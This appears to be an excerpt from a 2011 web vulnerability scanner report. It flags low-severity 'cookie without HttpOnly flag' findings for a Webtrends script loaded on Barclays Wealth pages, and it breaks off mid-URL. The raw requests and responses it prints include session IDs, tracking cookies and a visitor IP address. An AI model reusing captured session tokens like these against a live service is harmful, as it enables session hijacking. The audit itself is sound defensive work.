Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=030ea120; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200feed40; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.28. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0561583b; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0008fc39; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203169299; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.29. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bb